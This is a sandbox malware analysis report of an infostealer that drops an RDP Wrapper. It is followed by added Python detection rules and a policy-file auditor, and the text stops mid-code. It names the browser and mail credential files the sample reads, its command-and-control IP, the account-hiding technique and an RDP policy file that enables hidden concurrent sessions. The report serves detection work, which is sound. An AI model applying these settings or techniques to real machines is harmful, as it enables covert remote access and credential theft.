          Source: Yara match | File source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\ProgramData\images.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: POP3 Password 0_2_02D1A29A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: SMTP Password 0_2_02D1A29A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: IMAP Password 0_2_02D1A29A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: \Google\Chrome\User Data\Default\Login Data 0_2_02D1C1B2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: \Chromium\User Data\Default\Login Data 0_2_02D1C1B2
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe PID: 6324, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: images.exe PID: 6516, type: MEMORYSTR

Remote Access Functionality

Source: Yara match, file source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\ProgramData\images.exe, code function 4_3_02F652D0: sqlite3_transfer_bindings
MITRE ATT&CK Matrix

Techniques flagged by the analysis, grouped by tactic. The number in parentheses is the signature-count prefix exactly as printed in the report's matrix cell; template cells that carry no count (including the mobile-only Network Effects and Remote Service Effects columns) are omitted.

Initial Access: no technique flagged
Execution: Windows Management Instrumentation (21); Scripting (11); Native API (12); Service Execution (2)
Persistence: LSASS Driver (1); DLL Side-Loading (1); Create Account (1); Windows Service (21); Registry Run Keys / Startup Folder (2)
Privilege Escalation: LSASS Driver (1); DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (21); Process Injection (422); Registry Run Keys / Startup Folder (2)
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Scripting (11); Obfuscated Files or Information (21); Software Packing (11); DLL Side-Loading (1); Masquerading (13); Virtualization/Sandbox Evasion (41); Access Token Manipulation (1); Process Injection (422); Hidden Users (2); NTFS File Attributes (1)
Credential Access: OS Credential Dumping (3); Input Capture (121); Credentials In Files (1)
Discovery: System Time Discovery (1); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (39); Security Software Discovery (141); Virtualization/Sandbox Evasion (41); Process Discovery (3); Application Window Discovery (1)
Lateral Movement: no technique flagged
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (121)
Exfiltration: no technique flagged
Command and Control: Ingress Tool Transfer (21); Encrypted Channel (2); Non-Standard Port (1); Application Layer Protocol (1)
Impact: Endpoint Denial of Service (1)
Behavior Graph (ID 631792, start date 22/05/2022, architecture WINDOWS, score 100), rendered as a process tree:

Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures.

- SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe (started)
  - dropped: C:\ProgramData\images.exe (PE32); C:\ProgramData:ApplicationData (PE32, stored as an alternate data stream on the ProgramData directory); C:\Users\user\AppData\...\programs.bat:start (ASCII); 2 other malicious files
  - signatures: Creates files in alternative data streams (ADS); Drops script or batch files to the startup folder; Contains functionality to inject threads in other processes; 5 other signatures
  - images.exe (started)
    - network: 23.227.202.157, local port 49740 to remote port 8080, HVC-AS, United States
    - dropped: C:\Program Files\Microsoft DN1\sqlmap.dll (PE32+)
    - signatures: Multi AV Scanner detection for dropped file; Hides user accounts; Tries to steal Mail credentials (via file / registry access); 7 other signatures
    - cmd.exe (started)
      - conhost.exe
    - powershell.exe (started)
      - conhost.exe
  - powershell.exe (started)
    - conhost.exe
- cmd.exe (started)
  - WMIC.exe (signature: Creates processes via WMI)
  - conhost.exe
- tsusbhub.sys (started; driver)
- 4 other processes
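The process tree above gives a detection engineer five concrete, host-observable behaviours: a script dropped into the Startup folder, a PE written into an alternate data stream under ProgramData, a DLL dropped into "C:\Program Files\Microsoft DN1", WMIC.exe spawned by cmd.exe, and powershell.exe spawned by a binary living in a user-writable directory, plus the account-hiding behaviour flagged in the signatures. The following Python is an added example, not part of the Joe Sandbox report, that runs those rules over Sysmon-style events. The events are constructed from the paths in this report; the registry path for hiding accounts (Winlogon\SpecialAccounts\UserList) and the account name svc_hidden are assumptions, since the report does not show them, and the Zone.Identifier event is included to show the benign ADS that the rule must not fire on.

```python
"""Sysmon-style behaviour rules derived from the process tree in this report."""
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]  # flattened Sysmon event: EventID plus the fields a rule needs

STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1")
# Drive-rooted path with a second ':' is an NTFS alternate data stream; group 1 is the stream name.
ADS_RE = re.compile(r"^[A-Za-z]:\\[^:]*:([^:\\]+)$")
BENIGN_STREAMS = {"zone.identifier", "$data"}  # browser mark-of-the-web and the default stream
DROP_DIR = "c:\\program files\\microsoft dn1\\"  # directory used by this sample for sqlmap.dll
# Assumed key (not shown in the report): a DWORD 0 under UserList hides that account from logon.
USERLIST_KEY = "\\winlogon\\specialaccounts\\userlist\\"
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\")


def image_name(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def check_event(ev: Event) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) for every rule the event triggers."""
    hits: List[Tuple[str, str]] = []
    eid = ev["EventID"]
    if eid == 11:  # FileCreate
        target = str(ev["TargetFilename"])
        low = target.lower()
        if STARTUP_DIR in low and low.endswith(SCRIPT_EXT):
            hits.append(("startup_script_drop", target))
        m = ADS_RE.match(target)
        if m and m.group(1).lower() not in BENIGN_STREAMS:
            hits.append(("ads_write", target))
        if low.startswith(DROP_DIR) and low.endswith(".dll"):
            hits.append(("dll_drop_microsoft_dn1", target))
    elif eid == 1:  # ProcessCreate
        image, parent = str(ev["Image"]), str(ev["ParentImage"])
        if image_name(image) == "wmic.exe" and image_name(parent) == "cmd.exe":
            hits.append(("wmic_from_cmd", f"{parent} -> {image}"))
        if image_name(image) == "powershell.exe" and parent.lower().startswith(USER_WRITABLE):
            hits.append(("powershell_from_user_writable_parent", f"{parent} -> {image}"))
    elif eid == 13:  # RegistryEvent (value set)
        key = str(ev["TargetObject"])
        if USERLIST_KEY in key.lower():
            hits.append(("hidden_user_registry", key))
    return hits


def scan(events: List[Event]) -> List[Tuple[str, str, str]]:
    """(rule, acting image, detail) for every hit across a batch of events."""
    return [(rule, image_name(str(ev["Image"])), detail)
            for ev in events for rule, detail in check_event(ev)]


SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"
DROPPER = r"C:\ProgramData\images.exe"

# Constructed events mirroring the report's process tree (plus two benign controls).
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 11, "Image": SAMPLE, "TargetFilename": DROPPER},  # plain PE drop, no rule
    {"EventID": 11, "Image": SAMPLE, "TargetFilename": r"C:\ProgramData:ApplicationData"},
    {"EventID": 11, "Image": SAMPLE, "TargetFilename":
        r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat"},
    {"EventID": 11, "Image": DROPPER, "TargetFilename": r"C:\Program Files\Microsoft DN1\sqlmap.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": DROPPER},
    {"EventID": 13, "Image": DROPPER, "TargetObject":  # assumed key and account name
        r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\svc_hidden"},
    {"EventID": 11, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "TargetFilename": r"C:\Users\user\Downloads\report.pdf:Zone.Identifier"},  # benign ADS
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(" | ".join(finding))
```

Each rule on its own is noisy in a large estate (PowerShell launched from C:\Users is common on developer machines); the value is in the co-occurrence on one host within minutes, which is exactly what the report's timeline shows.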

Antivirus detection, submitted file:
Source | Detection | Scanner | Label
SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | 24% | ReversingLabs | Win32.Trojan.Streamer
SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files:
Source | Detection | Scanner | Label
C:\Program Files\Microsoft DN1\sqlmap.dll | 100% | Avira | PUA/Remoteadmin.AR
C:\ProgramData:ApplicationData | 100% | Joe Sandbox ML |
C:\ProgramData\images.exe | 100% | Joe Sandbox ML |
C:\Program Files\Microsoft DN1\sqlmap.dll | 49% | Virustotal |
C:\Program Files\Microsoft DN1\sqlmap.dll | 20% | Metadefender |
C:\Program Files\Microsoft DN1\sqlmap.dll | 50% | ReversingLabs | Win64.PUA.Presenoker
C:\ProgramData:ApplicationData | 24% | ReversingLabs | Win32.Trojan.Streamer
C:\ProgramData\images.exe | 24% | ReversingLabs | Win32.Trojan.Streamer

Antivirus detection, unpacked PE files:
Source | Detection | Scanner | Label
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack | 100% | Avira | TR/Redcap.ghjpt
0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.2.unpack | 100% | Avira | TR/Patched.Ren.Gen3
4.3.images.exe.732cb8.3.unpack | 100% | Avira | TR/Patched.Ren.Gen3
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack | 100% | Avira | TR/Patched.Ren.Gen3
4.0.images.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.0.images.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.6.unpack | 100% | Avira | TR/Patched.Ren.Gen3
0.0.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.0.images.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.3.images.exe.732cb8.7.unpack | 100% | Avira | TR/Patched.Ren.Gen3
4.2.images.exe.22e053f.3.unpack | 100% | Avira | TR/Patched.Ren.Gen3
4.2.images.exe.2ce0000.4.unpack | 100% | Avira | TR/Redcap.ghjpt
4.0.images.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.images.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Antivirus detection, domains: no antivirus matches

Antivirus detection, URLs:
Source | Detection | Scanner | Label
http://stascorp.comDVarFileInfo$ | 0% | Avira URL Cloud | safe
http://www.microsoft. | 0% | URL Reputation | safe
http://crl.micro | 0% | URL Reputation | safe
http://crl.microsof | 0% | URL Reputation | safe
23.227.202.157 | 2% | Virustotal |
23.227.202.157 | 0% | Avira URL Cloud | safe

No contacted domains info
Contacted IPs:
Name | Malicious | Antivirus Detection | Reputation
23.227.202.157 | true | Virustotal 2%; Avira URL Cloud: safe | unknown
URLs found in memory and binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
https://support.google.com/chrome/?p=plugin_flash | images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://stascorp.comDVarFileInfo$ | sqlmap.dll.4.dr | false | Avira URL Cloud: safe | low
http://www.microsoft. | powershell.exe, 00000001.00000003.342861149.0000000008D06000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micro | powershell.exe, 00000006.00000003.407047557.00000000076DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/syohex/java-simple-mine-sweeperC: | SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.409298369.00000000044C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsof | powershell.exe, 00000001.00000003.377239509.00000000075FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.384190535.00000000075FB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chrome/answer/6258784 | images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/syohex/java-simple-mine-sweeper | SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmp | false | | high

None of these URLs was contacted; they are strings recovered from memory. The stascorp.com entry is the URL from the version resource of sqlmap.dll (the trailing "DVarFileInfo$" is the adjacent VS_VERSIONINFO block data), and stascorp.com is the site of the RDP Wrapper author, which matches the RDP Wrapper configuration file dropped alongside it. The java-simple-mine-sweeper string sits in the four memory regions (2310000, 2D24000, 22E0000, 2CF4000) that also match the Yara rules listed above, so it belongs to the unpacked payload itself and is usable as a hunting string rather than as a network indicator. The truncated www.microsoft. and crl.micro entries are partial certificate-revocation URLs left in powershell.exe memory and are not attributable to the sample.
IP | Domain | Country | ASN | ASN Name | Malicious
23.227.202.157 | unknown | United States | 29802 | HVC-AS | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 631792
Start date and time: 2022-05-22 12:32:06 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 9s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507 (renamed file extension from 7507 to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winEXE@18/18@0/1
EGA Information:
• Successful, ratio: 66.7%
HDC Information:
• Successful, ratio: 44.8% (good quality ratio 44.4%)
• Quality average: 86.8%
• Quality standard deviation: 21.1%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 64
• Number of non-executed functions: 155
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Execution Graph export aborted for target images.exe, PID 6516 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
Time | Type | Description
12:33:15 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat
12:33:27 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
12:33:28 | API Interceptor | 854x Sleep call for process: cmd.exe modified
12:33:44 | API Interceptor | 50x Sleep call for process: powershell.exe modified
Context, contacted IP:
Match | Associated Sample Name / URL | Detection
23.227.202.157 | SecuriteInfo.com.Variant.Lazy.183857.17696.exe | malicious

Context, domains: no context

Context, ASN HVC-AS (other samples seen in this ASN, each with the IP it contacted; all detected as malicious):
• Qq5ciT0MpR: 107.155.88.141
• invoice_pdf_125.iso: 23.227.203.120
• SecuriteInfo.com.Variant.Lazy.183857.17696.exe: 23.227.202.157
• GatewayService.exe: 104.156.51.181
• boat.arm: 46.21.151.187
• 21899963262.xlsb: 23.227.199.109
• 21899963262.xlsb: 23.227.199.109
• sora.arm: 23.227.187.69
• ramest.dll: 23.227.203.120
• PAYMENT_SWIFT-MT103.html: 46.21.153.133
• 5nVzMAV6qt: 66.232.127.255
• https://bit.ly/3KP8fJG: 23.227.193.162
• https://luka-petek.com/backagain/home/: 37.1.209.132
• oblot.dll: 23.227.203.120
• oblot.dll: 23.227.203.120
• ramest.dll: 23.227.203.120
• ramest.dll: 23.227.203.120
• oblot.dll: 23.227.203.120
• oblot.dll: 23.227.203.120
• 3wU3EeiE62: 23.239.174.247

Context, JA3 fingerprints: no context

Context, dropped file C:\Program Files\Microsoft DN1\sqlmap.dll (also dropped by the following samples, all detected as malicious):
• SOA & UNPAID INVOICES.pdf.exe
• Suvhviwivhrjbykcqcwltjbuuplxoiafsc.exe
• SecuriteInfo.com.Variant.Lazy.183857.17696.exe
• request..exe
• 24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe
• SecuriteInfo.com.W32.AIDetectNet.01.26190.exe
• SecuriteInfo.com.W32.AIDetectNet.01.25523.exe
• SecuriteInfo.com.W32.AIDetectNet.01.18574.exe
• sat#U0131nalma sipari#U015fi 4503995683.exe
• PO 202204TR.exe
• Scan-file-09267992827627.exe
• Nuevo pedido actualizad.exe
• SecuriteInfo.com.Trojan.GenericKD.39486000.3897.exe
• N2L7ikW1cK.exe
• DHL_119040 receipt document.exe
• yrokkcTZj4.exe
• PO-11698 SLUB-DRAWING.pdf.exe
• Doc_DELIVERY_89099388889904038838727.exe
• Purchase order PL0028.exe
• D7CfYxusMr6xkTb.exe
Dropped file: RDP Wrapper Library configuration (the report does not give the file name)
Process: C:\ProgramData\images.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 253693
Entropy (8bit): 5.4435816594509685
Encrypted: false
SSDEEP: 768:NUiQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb5x8Rr/d6gl/+f8jZ0ftlFi4x7Qc:WJ33L+MoIiG4IvREWddadl/FY
MD5: 4997128EF0ECA4C4696BF4177FF3AFF5
SHA1: 7DD50F7BE34F25D580378A84B8F11A08F7EE8D1F
SHA-256: C59A7CF7B08FA7F79C51CA9126300B32FCEECE6972A9E8837D384804FD613E24
SHA-512: 70DABDCDAE178CFB3D22EE2B00EBB747D17504864E68550256C5EE74B8D17506F88C0F057C8B91E666146B6E758C6C10EEDC123C871E2203C2BF5F67BD05EC66
Malicious: false
Preview (CRLF line breaks expanded; truncated where the report truncates it):
; RDP Wrapper Library configuration
; Do not modify without special knowledge
; Edited by sebaxakerhtc

[Main]
Updated=2022-02-06
LogFile=\rdpwrap.txt
SLPolicyHookNT60=1
SLPolicyHookNT61=1

[SLPolicy]
TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1
TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1
TerminalServices-RemoteConnectionManager-AllowAppServerMode=1
TerminalServices-RemoteConnectionManager-AllowMultimon=1
TerminalServices-RemoteConnectionManager-MaxUserSessions=0
TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0
TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2
TerminalServices-RDP-7-Advanced-Compression-Allowed=1
TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0
TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000
TerminalServices-DeviceRedirection-Licenses-TS

The scanners rate this text file as not malicious on its own, but it is the policy file that the RDP Wrapper library (dropped as sqlmap.dll, next entry) feeds to the Remote Desktop service: with the SLPolicy hooks enabled, termsrv is told that remote connections, multiple concurrent sessions and app-server mode are all allowed and that there is no per-user session cap. Combined with the account creation and account hiding flagged in the signatures, that gives the operator an RDP session on the victim that does not displace the logged-on user.
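What matters in the preview above is which session-policy answers the wrapper will give termsrv, so a triage step is to parse the file and flag the settings that turn a workstation into a multi-session RDP host. The Python below is an added example, not code from the report or from the RDP Wrapper project: it carries a tolerant INI reader (the file ends in a truncated line, which the standard configparser would reject) and an audit that flags the four policy values in this file which weaken the session policy. The input is the preview from the report, reconstructed with real line breaks; the interpretation of MaxUserSessions=0 as "no cap" is an assumption about RDP Wrapper semantics.

```python
"""Audit an RDP Wrapper (rdpwrap.ini-style) policy file for session-policy overrides."""
from typing import Dict, List, Tuple

# Constructed input: the RDP Wrapper policy preview shown in this report, with the
# CRLF line breaks expanded. The last line is truncated exactly as the report shows it.
RDPWRAP_INI_PREVIEW = r"""; RDP Wrapper Library configuration
; Do not modify without special knowledge
; Edited by sebaxakerhtc

[Main]
Updated=2022-02-06
LogFile=\rdpwrap.txt
SLPolicyHookNT60=1
SLPolicyHookNT61=1

[SLPolicy]
TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1
TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1
TerminalServices-RemoteConnectionManager-AllowAppServerMode=1
TerminalServices-RemoteConnectionManager-AllowMultimon=1
TerminalServices-RemoteConnectionManager-MaxUserSessions=0
TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0
TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2
TerminalServices-RDP-7-Advanced-Compression-Allowed=1
TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0
TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000
TerminalServices-DeviceRedirection-Licenses-TS
"""

Sections = Dict[str, Dict[str, str]]


def parse_ini(text: str) -> Tuple[Sections, List[str]]:
    """Tolerant INI reader: ';' comments, [section] headers, key=value pairs.

    Lines without '=' (such as a truncated tail) are returned separately instead of
    raising, so a partial capture can still be audited.
    """
    sections: Sections = {}
    malformed: List[str] = []
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if "=" not in line:
            malformed.append(line)
            continue
        key, value = line.split("=", 1)
        sections.setdefault(current, {})[key.strip()] = value.strip()
    return sections, malformed


# (policy key, value that weakens the session policy, why it matters)
RISKY_POLICIES = [
    ("TerminalServices-RemoteConnectionManager-AllowRemoteConnections", "1",
     "remote connections reported as allowed regardless of Windows edition"),
    ("TerminalServices-RemoteConnectionManager-AllowMultipleSessions", "1",
     "concurrent interactive sessions allowed (hidden session alongside the console user)"),
    ("TerminalServices-RemoteConnectionManager-AllowAppServerMode", "1",
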